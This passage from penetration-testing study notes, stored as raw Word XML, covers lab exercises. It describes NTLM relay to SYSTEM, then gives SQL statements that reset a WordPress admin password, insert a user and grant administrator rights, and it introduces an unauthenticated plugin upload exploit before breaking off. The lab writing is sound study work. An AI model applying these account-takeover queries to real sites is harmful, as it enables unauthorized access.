      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD4">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great! We successfully obtained code execution as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by authenticating as a local </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on MAILSRV1 by relaying an authentication attempt from the WordPress plugin on INTERNALSRV1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the next Learning Unit, we'll leverage the interactive shell on MAILSRV1 to obtain privileged access to the domain and its domain controller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v1nu1fo6ono0" w:id="405"/>
      <w:bookmarkEnd w:id="405"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset admin password in wordpress_db MySQL database (and technically any other MySQL database)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was also done in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. I didn't do it myself, but someone else did it. It was done on the 172.16.xxx.7 machine and then they uploaded a malicious plugin that got them a reverse shell. Look at the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell with Admin Privileges using "Add new" button for plugins</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" section for more info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DDA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DDB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DDC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1007">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetMidnight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we had a MySQL database called wordpress_db. Inside this database was a table called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wp_users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DDD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DDE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this table was the admin user, but it's MD5 hash was uncrackable, so we just reset the password to something we know</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DDF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1841500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="567" name="image188.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image188.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52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2DE0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE wp_users SET user_pass = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5('password')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE wp_users.user_login = "admin";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">update wp_users set user_pass=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5('password')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where ID=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we can log into wordpress now with credentials admin : password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In another writeup, they instead added another user (non-privileged) to the database in order to get past the WordPress login page. And they also have a theory of how to give it privileges. I talk about how to do that in the section below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x527w0wrshaf" w:id="406"/>
      <w:bookmarkEnd w:id="406"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add user in wordpress_db MySQL database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In another </w:t>
      </w:r>
      <w:hyperlink r:id="rId1008">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetMidnight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play walkthrough, they add a user to the MySQL wp_users table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT INTO wp_users(ID,user_login, user_pass) VALUES(3,"cristiano",</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5("password")</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="800100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="454" name="image457.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image457.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1009"/>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2DEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DEB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You could also try giving admin privileges to cristiano by referring wp_usermeta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4717082" cy="3076687"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="165" name="image161.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image161.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1010"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4717082" cy="3076687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DEE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">insert into wp_usermeta(umeta_id,user_id,meta_key,meta_value) VALUES (NULL,'3','wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'), (NULL,"9000",'wp_user_level','10');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DEF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although they never tried to see if it worked, so this is just a theory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qfswbls4v9nm" w:id="407"/>
      <w:bookmarkEnd w:id="407"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get reverse shell from Simple File List 4.2.2 (NO AUTHENTICATION)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1011">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nukem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, we saw from WPscan that we had two out–dated plugins, and both had exploitDB pages:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="500"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple File List 4.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="500"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tutor 1.5.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We ended up trying Simple File List and so I never figured out of Tutor works. And the best part of this is what we don't need authentication for this exploit. We never found credentials for wordpress site. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DF9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DFA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit is a file upload exploit. And the WPScan also found the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/wp-content/uploads </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">where the uploads likely go</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:hyperlink r:id="rId1012">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">writeup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
